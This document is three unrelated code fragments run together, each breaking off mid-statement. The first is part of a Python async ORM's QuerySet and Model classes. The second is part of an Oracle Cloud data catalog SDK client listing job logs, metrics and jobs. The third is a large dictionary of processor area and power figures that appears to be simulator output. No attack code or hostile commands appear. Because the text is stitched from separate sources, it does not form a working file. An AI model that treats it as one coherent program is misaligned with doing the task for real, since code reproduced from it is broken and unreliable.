"exact" column = self.table.columns[key] # Map the operation code onto SQLAlchemy's ColumnElement # https://docs.sqlalchemy.org/en/latest/core/sqlelement.html#sqlalchemy.sql.expression.ColumnElement op_attr = FILTER_OPERATORS[op] has_escaped_character = False if op in ["contains", "icontains"]: has_escaped_character = any( c for c in self.ESCAPE_CHARACTERS if c in value ) if has_escaped_character: # enable escape modifier for char in self.ESCAPE_CHARACTERS: value = value.replace(char, f"\\{char}") value = f"%{value}%" if isinstance(value, Model): value = value.pk clause = getattr(column, op_attr)(value) clause.modifiers["escape"] = "\\" if has_escaped_character else None clauses.append(clause) if _exclude: filter_clauses.append(sqlalchemy.not_(sqlalchemy.sql.and_(*clauses))) else: filter_clauses += clauses return self.__class__( model_cls=self.model_cls, filter_clauses=filter_clauses, select_related=select_related, limit_count=self.limit_count, offset=self.query_offset, order_by=self._order_by, ) def search(self, term: typing.Any): if not term: return self filter_clauses = list(self.filter_clauses) value = f"%{term}%" # has_escaped_character = any(c for c in self.ESCAPE_CHARACTERS if c in term) # if has_escaped_character: # # enable escape modifier # for char in self.ESCAPE_CHARACTERS: # term = term.replace(char, f'\\{char}') # term = f"%{value}%" # # clause.modifiers['escape'] = '\\' if has_escaped_character else None search_fields = [ name for name, field in self.model_cls.fields.items() if isinstance(field, (String, Text)) ] search_clauses = [ self.table.columns[name].ilike(value) for name in search_fields ] if len(search_clauses) > 1: filter_clauses.append(sqlalchemy.sql.or_(*search_clauses)) else: filter_clauses.extend(search_clauses) return self.__class__( model_cls=self.model_cls, filter_clauses=filter_clauses, select_related=self._select_related, limit_count=self.limit_count, offset=self.query_offset, order_by=self._order_by, ) def order_by(self, *order_by): return self.__class__( model_cls=self.model_cls, filter_clauses=self.filter_clauses, select_related=self._select_related, limit_count=self.limit_count, offset=self.query_offset, order_by=order_by, ) def select_related(self, related): if not isinstance(related, (list, tuple)): related = [related] related = list(self._select_related) + related return self.__class__( model_cls=self.model_cls, filter_clauses=self.filter_clauses, select_related=related, limit_count=self.limit_count, offset=self.query_offset, order_by=self._order_by, ) async def exists(self) -> bool: expr = self._build_select_expression() expr = sqlalchemy.exists(expr).select() return await self.database.fetch_val(expr) def limit(self, limit_count: int): return self.__class__( model_cls=self.model_cls, filter_clauses=self.filter_clauses, select_related=self._select_related, limit_count=limit_count, offset=self.query_offset, order_by=self._order_by, ) def offset(self, offset: int): return self.__class__( model_cls=self.model_cls, filter_clauses=self.filter_clauses, select_related=self._select_related, limit_count=self.limit_count, offset=offset, order_by=self._order_by, ) async def count(self) -> int: expr = self._build_select_expression().alias("subquery_for_count") expr = sqlalchemy.func.count().select().select_from(expr) return await self.database.fetch_val(expr) async def all(self, **kwargs): if kwargs: return await self.filter(**kwargs).all() expr = self._build_select_expression() rows = await self.database.fetch_all(expr) return [ self.model_cls._from_row(row, select_related=self._select_related) for row in rows ] async def get(self, **kwargs): if kwargs: return await self.filter(**kwargs).get() expr = self._build_select_expression().limit(2) rows = await self.database.fetch_all(expr) if not rows: raise NoMatch() if len(rows) > 1: raise MultipleMatches() return self.model_cls._from_row(rows[0], select_related=self._select_related) async def first(self, **kwargs): if kwargs: return await self.filter(**kwargs).first() rows = await self.limit(1).all() if rows: return rows[0] def _validate_kwargs(self, **kwargs): fields = self.model_cls.fields validator = typesystem.Schema( fields={key: value.validator for key, value in fields.items()} ) kwargs = validator.validate(kwargs) for key, value in fields.items(): if value.validator.read_only and value.validator.has_default(): kwargs[key] = value.validator.get_default_value() return kwargs async def create(self, **kwargs): kwargs = self._validate_kwargs(**kwargs) instance = self.model_cls(**kwargs) expr = self.table.insert().values(**kwargs) if self.pkname not in kwargs: instance.pk = await self.database.execute(expr) else: await self.database.execute(expr) return instance async def bulk_create(self, objs: typing.List[typing.Dict]) -> None: new_objs = [self._validate_kwargs(**obj) for obj in objs] expr = self.table.insert().values(new_objs) await self.database.execute(expr) async def delete(self) -> None: expr = self.table.delete() for filter_clause in self.filter_clauses: expr = expr.where(filter_clause) await self.database.execute(expr) async def update(self, **kwargs) -> None: fields = { key: field.validator for key, field in self.model_cls.fields.items() if key in kwargs } validator = typesystem.Schema(fields=fields) kwargs = _update_auto_now_fields( validator.validate(kwargs), self.model_cls.fields ) expr = self.table.update().values(**kwargs) for filter_clause in self.filter_clauses: expr = expr.where(filter_clause) await self.database.execute(expr) async def get_or_create( self, defaults: typing.Dict[str, typing.Any], **kwargs ) -> typing.Tuple[typing.Any, bool]: try: instance = await self.get(**kwargs) return instance, False except NoMatch: kwargs.update(defaults) instance = await self.create(**kwargs) return instance, True async def update_or_create( self, defaults: typing.Dict[str, typing.Any], **kwargs ) -> typing.Tuple[typing.Any, bool]: try: instance = await self.get(**kwargs) await instance.update(**defaults) return instance, False except NoMatch: kwargs.update(defaults) instance = await self.create(**kwargs) return instance, True def _prepare_order_by(self, order_by: str): reverse = order_by.startswith("-") order_by = order_by.lstrip("-") order_col = self.table.columns[order_by] return order_col.desc() if reverse else order_col class Model(metaclass=ModelMeta): objects = QuerySet() def __init__(self, **kwargs): if "pk" in kwargs: kwargs[self.pkname] = kwargs.pop("pk") for key, value in kwargs.items(): if key not in self.fields: raise ValueError( f"Invalid keyword {key} for class {self.__class__.__name__}" ) setattr(self, key, value) @property def pk(self): return getattr(self, self.pkname) @pk.setter def pk(self, value): setattr(self, self.pkname, value) def __repr__(self): return f"<{self.__class__.__name__}: {self}>" def __str__(self): return f"{self.__class__.__name__}({self.pkname}={self.pk})" @classmethod def build_table(cls): tablename = cls.tablename metadata = cls.registry._metadata columns = [] for name, field in cls.fields.items(): columns.append(field.get_column(name)) return sqlalchemy.Table(tablename, metadata, *columns, extend_existing=True) @property def table(self) -> sqlalchemy.Table: return self.__class__.table async def update(self, **kwargs): fields = { key: field.validator for key, field in self.fields.items() if key in kwargs } validator = typesystem.Schema(fields=fields) kwargs = _update_auto_now_fields(validator.validate(kwargs), self.fields) pk_column = getattr(self.table.c, self.pkname) expr = self.table.update().values(**kwargs).where(pk_column == self.pk) await self.database.execute(expr) # Update the model instance. for key, value in kwargs.items(): setattr(self, key, value) async def delete(self) -> None: pk_column = getattr(self.table.c, self.pkname) expr = self.table.delete().where(pk_column == self.pk) await self.database.execute(expr) async
raise ValueError( "Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values) ) if 'sort_order' in kwargs: sort_order_allowed_values = ["ASC", "DESC"] if kwargs['sort_order'] not in sort_order_allowed_values: raise ValueError( "Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values) ) query_params = { "lifecycleState": kwargs.get("lifecycle_state", missing), "severity": kwargs.get("severity", missing), "timeCreated": kwargs.get("time_created", missing), "timeUpdated": kwargs.get("time_updated", missing), "createdById": kwargs.get("created_by_id", missing), "updatedById": kwargs.get("updated_by_id", missing), "fields": self.base_client.generate_collection_format_param(kwargs.get("fields", missing), 'multi'), "sortBy": kwargs.get("sort_by", missing), "sortOrder": kwargs.get("sort_order", missing), "limit": kwargs.get("limit", missing), "page": kwargs.get("page", missing) } query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None} header_params = { "accept": "application/json", "content-type": "application/json", "opc-request-id": kwargs.get("opc_request_id", missing) } header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None} retry_strategy = self.retry_strategy if kwargs.get('retry_strategy'): retry_strategy = kwargs.get('retry_strategy') if retry_strategy: return retry_strategy.make_retrying_call( self.base_client.call_api, resource_path=resource_path, method=method, path_params=path_params, query_params=query_params, header_params=header_params, response_type="JobLogCollection") else: return self.base_client.call_api( resource_path=resource_path, method=method, path_params=path_params, query_params=query_params, header_params=header_params, response_type="JobLogCollection") def list_job_metrics(self, catalog_id, job_key, job_execution_key, **kwargs): """ Returns a list of job metrics. :param str catalog_id: (required) Unique catalog identifier. :param str job_key: (required) Unique job key. :param str job_execution_key: (required) The key of the job execution. :param str display_name: (optional) A filter to return only resources that match the entire display name given. The match is not case sensitive. :param str category: (optional) Category of this metric. :param str sub_category: (optional) Sub category of this metric under the category. Used for aggregating values. May be null. :param str unit: (optional) Unit of this metric. :param str value: (optional) Value of this metric. :param str batch_key: (optional) Batch key for grouping, may be null. :param datetime time_created: (optional) Time that the resource was created. An `RFC3339`__ formatted datetime string. __ https://tools.ietf.org/html/rfc3339 :param datetime time_updated: (optional) Time that the resource was updated. An `RFC3339`__ formatted datetime string. __ https://tools.ietf.org/html/rfc3339 :param datetime time_inserted: (optional) The time the metric was logged or captured in the system where the job executed. An `RFC3339`__ formatted datetime string. __ https://tools.ietf.org/html/rfc3339 :param str created_by_id: (optional) OCID of the user who created the resource. :param str updated_by_id: (optional) OCID of the user who updated the resource. :param list[str] fields: (optional) Specifies the fields to return in a job metric summary response. Allowed values are: "key", "description", "displayName", "timeInserted", "category", "subCategory", "unit", "value", "batchKey", "jobExecutionKey", "timeCreated", "uri" :param str sort_by: (optional) The field to sort by. Only one sort order may be provided. Default order for TIMECREATED is descending. Default order for DISPLAYNAME is ascending. If no value is specified TIMECREATED is default. Allowed values are: "TIMECREATED", "DISPLAYNAME" :param str sort_order: (optional) The sort order to use, either 'asc' or 'desc'. Allowed values are: "ASC", "DESC" :param int limit: (optional) The maximum number of items to return. :param str page: (optional) The page token representing the page at which to start retrieving results. This is usually retrieved from a previous list call. :param str opc_request_id: (optional) The client request ID for tracing. :param obj retry_strategy: (optional) A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level. This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` is also available. The specifics of the default retry strategy are described `here <https://oracle-cloud-infrastructure-python-sdk.readthedocs.io/en/latest/sdk_behaviors/retries.html>`__. To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`. :return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_catalog.models.JobMetricCollection` :rtype: :class:`~oci.response.Response` """ resource_path = "/catalogs/{catalogId}/jobs/{jobKey}/executions/{jobExecutionKey}/metrics" method = "GET" # Don't accept unknown kwargs expected_kwargs = [ "retry_strategy", "display_name", "category", "sub_category", "unit", "value", "batch_key", "time_created", "time_updated", "time_inserted", "created_by_id", "updated_by_id", "fields", "sort_by", "sort_order", "limit", "page", "opc_request_id" ] extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs] if extra_kwargs: raise ValueError( "list_job_metrics got unknown kwargs: {!r}".format(extra_kwargs)) path_params = { "catalogId": catalog_id, "jobKey": job_key, "jobExecutionKey": job_execution_key } path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing} for (k, v) in six.iteritems(path_params): if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0): raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k)) if 'fields' in kwargs: fields_allowed_values = ["key", "description", "displayName", "timeInserted", "category", "subCategory", "unit", "value", "batchKey", "jobExecutionKey", "timeCreated", "uri"] for fields_item in kwargs['fields']: if fields_item not in fields_allowed_values: raise ValueError( "Invalid value for `fields`, must be one of {0}".format(fields_allowed_values) ) if 'sort_by' in kwargs: sort_by_allowed_values = ["TIMECREATED", "DISPLAYNAME"] if kwargs['sort_by'] not in sort_by_allowed_values: raise ValueError( "Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values) ) if 'sort_order' in kwargs: sort_order_allowed_values = ["ASC", "DESC"] if kwargs['sort_order'] not in sort_order_allowed_values: raise ValueError( "Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values) ) query_params = { "displayName": kwargs.get("display_name", missing), "category": kwargs.get("category", missing), "subCategory": kwargs.get("sub_category", missing), "unit": kwargs.get("unit", missing), "value": kwargs.get("value", missing), "batchKey": kwargs.get("batch_key", missing), "timeCreated": kwargs.get("time_created", missing), "timeUpdated": kwargs.get("time_updated", missing), "timeInserted": kwargs.get("time_inserted", missing), "createdById": kwargs.get("created_by_id", missing), "updatedById": kwargs.get("updated_by_id", missing), "fields": self.base_client.generate_collection_format_param(kwargs.get("fields", missing), 'multi'), "sortBy": kwargs.get("sort_by", missing), "sortOrder": kwargs.get("sort_order", missing), "limit": kwargs.get("limit", missing), "page": kwargs.get("page", missing) } query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None} header_params = { "accept": "application/json", "content-type": "application/json", "opc-request-id": kwargs.get("opc_request_id", missing) } header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None} retry_strategy = self.retry_strategy if kwargs.get('retry_strategy'): retry_strategy = kwargs.get('retry_strategy') if retry_strategy: return retry_strategy.make_retrying_call( self.base_client.call_api, resource_path=resource_path, method=method, path_params=path_params, query_params=query_params, header_params=header_params, response_type="JobMetricCollection") else: return self.base_client.call_api( resource_path=resource_path, method=method, path_params=path_params, query_params=query_params, header_params=header_params, response_type="JobMetricCollection") def list_jobs(self, catalog_id, **kwargs): """ Returns a list of jobs within a data catalog. :param str catalog_id: (required) Unique catalog identifier. :param str display_name: (optional) A filter to return only resources that match the entire display name given. The match is not case sensitive. :param str lifecycle_state: (optional) Job lifecycle state. :param datetime time_created: (optional) Time that the resource was created. An `RFC3339`__ formatted datetime string. __ https://tools.ietf.org/html/rfc3339 :param datetime time_updated: (optional) Time that the resource was updated. An `RFC3339`__ formatted datetime string. __ https://tools.ietf.org/html/rfc3339 :param str created_by_id: (optional) OCID of the user who created the resource. :param str updated_by_id: (optional) OCID of the user who updated the resource. :param str job_type: (optional) Job type. :param str job_definition_key: (optional) Unique job definition key. :param str schedule_cron_expression: (optional) Schedule specified in the cron expression format that has seven fields for second, minute, hour, day-of-month, month, day-of-week, year. It can also include special characters like * for all and ? for any. There are also pre-defined schedules that can be specified using special strings. For example, @hourly will run the job every hour. :param datetime time_schedule_begin: (optional) Date that the schedule should be operational. An `RFC3339`__ formatted datetime string. __ https://tools.ietf.org/html/rfc3339 :param datetime time_schedule_end: (optional) Date that the schedule should end from being operational. An `RFC3339`__ formatted datetime string. __ https://tools.ietf.org/html/rfc3339 :param str schedule_type: (optional) Type of the job schedule. :param str connection_key: (optional) Unique connection key. :param list[str] fields: (optional) Specifies the fields to return in a job summary response. Allowed values are: "key", "displayName", "description", "catalogId", "jobDefinitionKey", "lifecycleState", "timeCreated", "timeUpdated", "createdById", "updatedById", "jobType", "scheduleCronExpression", "timeScheduleBegin", "scheduleType", "executionCount", "timeOfLatestExecution", "executions", "uri" :param int execution_count: (optional) The total number of executions for this job schedule. :param datetime time_of_latest_execution: (optional) The date and time the most recent execution for this job ,in the format defined by `RFC3339`__. Example: `2019-03-25T21:10:29.600Z` __ https://tools.ietf.org/html/rfc3339 :param str sort_by: (optional) The field to sort by. Only one sort order may be provided. Default order for TIMECREATED is descending. Default order for DISPLAYNAME is ascending. If no value is specified TIMECREATED is default. Allowed values are: "TIMECREATED", "DISPLAYNAME" :param str sort_order: (optional) The sort order to use, either 'asc' or 'desc'. Allowed values are: "ASC", "DESC" :param int limit: (optional) The maximum number of items to return. :param str page: (optional) The page token representing the page at which to start retrieving results.
0.00435488, 'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228, 'Renaming Unit/Peak Dynamic': 3.58947, 'Renaming Unit/Runtime Dynamic': 0.0958855, 'Renaming Unit/Subthreshold Leakage': 0.0552466, 'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461, 'Runtime Dynamic': 1.70794, 'Subthreshold Leakage': 6.16288, 'Subthreshold Leakage with power gating': 2.55328}, {'Area': 32.0201, 'Execution Unit/Area': 7.68434, 'Execution Unit/Complex ALUs/Area': 0.235435, 'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646, 'Execution Unit/Complex ALUs/Peak Dynamic': 0.0228445, 'Execution Unit/Complex ALUs/Runtime Dynamic': 0.220632, 'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111, 'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163, 'Execution Unit/Floating Point Units/Area': 4.6585, 'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156, 'Execution Unit/Floating Point Units/Peak Dynamic': 0.130654, 'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033, 'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829, 'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061, 'Execution Unit/Gate Leakage': 0.120359, 'Execution Unit/Instruction Scheduler/Area': 1.66526, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.0516317, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519, 'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913, 'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223, 'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562, 'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763, 'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.08328, 'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755, 'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964, 'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262, 'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388, 'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608, 'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451, 'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0420369, 'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853, 'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446, 'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.176949, 'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892, 'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346, 'Execution Unit/Integer ALUs/Area': 0.47087, 'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291, 'Execution Unit/Integer ALUs/Peak Dynamic': 0.0390203, 'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344, 'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222, 'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833, 'Execution Unit/Peak Dynamic': 4.12507, 'Execution Unit/Register Files/Area': 0.570804, 'Execution Unit/Register Files/Floating Point RF/Area': 0.208131, 'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788, 'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0246833, 'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00216566, 'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698, 'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968, 'Execution Unit/Register Files/Gate Leakage': 0.000622708, 'Execution Unit/Register Files/Integer RF/Area': 0.362673, 'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992, 'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0239167, 'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0160164, 'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175, 'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675, 'Execution Unit/Register Files/Peak Dynamic': 0.0486, 'Execution Unit/Register Files/Runtime Dynamic': 0.0181821, 'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387, 'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643, 'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912, 'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402, 'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.0560983, 'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.154253, 'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478, 'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543, 'Execution Unit/Runtime Dynamic': 0.975392, 'Execution Unit/Subthreshold Leakage': 1.79543, 'Execution Unit/Subthreshold Leakage with power gating': 0.688821, 'Gate Leakage': 0.368936, 'Instruction Fetch Unit/Area': 5.85939, 'Instruction Fetch Unit/Branch Predictor/Area': 0.138516, 'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221, 'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362, 'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831, 'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 4.3366e-05, 'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719, 'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236, 'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 4.3366e-05, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 3.78861e-05, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 1.47289e-05, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045, 'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838, 'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732, 'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05, 'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602, 'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000230077, 'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505, 'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733, 'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.000354695, 'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703, 'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282, 'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954, 'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758, 'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867, 'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.000411702, 'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682, 'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357, 'Instruction Fetch Unit/Gate Leakage': 0.0589979, 'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323, 'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05, 'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827, 'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.015397, 'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885, 'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682, 'Instruction Fetch Unit/Instruction Cache/Area': 3.14635, 'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931, 'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 0.979382, 'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0378045, 'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022, 'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386, 'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799, 'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493, 'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404, 'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.0522951, 'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943, 'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104, 'Instruction Fetch Unit/Peak Dynamic': 3.24543, 'Instruction Fetch Unit/Runtime Dynamic': 0.106263, 'Instruction Fetch Unit/Subthreshold Leakage': 0.932286, 'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843, 'L2/Area': 4.53318, 'L2/Gate Leakage': 0.015464, 'L2/Peak Dynamic': 0.0403734, 'L2/Runtime Dynamic': 0.0121729, 'L2/Subthreshold Leakage': 0.834142, 'L2/Subthreshold Leakage with power gating': 0.401066, 'Load Store Unit/Area': 8.80901, 'Load Store Unit/Data Cache/Area': 6.84535, 'Load Store Unit/Data Cache/Gate Leakage': 0.0279261, 'Load Store Unit/Data Cache/Peak Dynamic': 1.8897, 'Load Store Unit/Data Cache/Runtime Dynamic': 0.331111, 'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675, 'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085, 'Load Store Unit/Gate Leakage': 0.0350888, 'Load Store Unit/LoadQ/Area': 0.0836782, 'Load Store Unit/LoadQ/Gate Leakage': 0.00059896, 'Load Store Unit/LoadQ/Peak Dynamic': 0.0211125, 'Load Store Unit/LoadQ/Runtime Dynamic': 0.0211124, 'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961, 'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918, 'Load Store Unit/Peak Dynamic': 1.9894, 'Load Store Unit/Runtime Dynamic': 0.456343, 'Load Store Unit/StoreQ/Area': 0.322079, 'Load Store Unit/StoreQ/Gate Leakage': 0.00329971, 'Load Store Unit/StoreQ/Peak Dynamic': 0.0520599, 'Load Store Unit/StoreQ/Runtime Dynamic': 0.104119, 'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621, 'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004, 'Load Store Unit/Subthreshold Leakage': 0.591321, 'Load Store Unit/Subthreshold Leakage with power gating': 0.283293, 'Memory Management Unit/Area': 0.4339, 'Memory Management Unit/Dtlb/Area': 0.0879726, 'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729, 'Memory Management Unit/Dtlb/Peak Dynamic': 0.0184762, 'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0190802, 'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699, 'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485, 'Memory Management Unit/Gate Leakage': 0.00808595, 'Memory Management Unit/Itlb/Area': 0.301552, 'Memory Management Unit/Itlb/Gate Leakage': 0.00393464, 'Memory Management Unit/Itlb/Peak Dynamic': 0.0608944, 'Memory Management Unit/Itlb/Runtime Dynamic': 0.0062045, 'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758, 'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842, 'Memory Management Unit/Peak Dynamic': 0.248742, 'Memory Management Unit/Runtime Dynamic': 0.0252847, 'Memory Management Unit/Subthreshold Leakage': 0.0766103, 'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333, 'Peak Dynamic': 13.2385, 'Renaming Unit/Area': 0.303608, 'Renaming Unit/FP Front End RAT/Area': 0.131045, 'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123, 'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468, 'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0649303, 'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571, 'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885, 'Renaming Unit/Free List/Area': 0.0340654, 'Renaming Unit/Free List/Gate Leakage': 2.5481e-05, 'Renaming Unit/Free List/Peak Dynamic': 0.0306032, 'Renaming Unit/Free List/Runtime Dynamic': 0.00311967, 'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144, 'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064, 'Renaming Unit/Gate Leakage': 0.00708398, 'Renaming Unit/Int Front End RAT/Area': 0.0941223, 'Renaming Unit/Int Front End RAT/Gate Leakage': 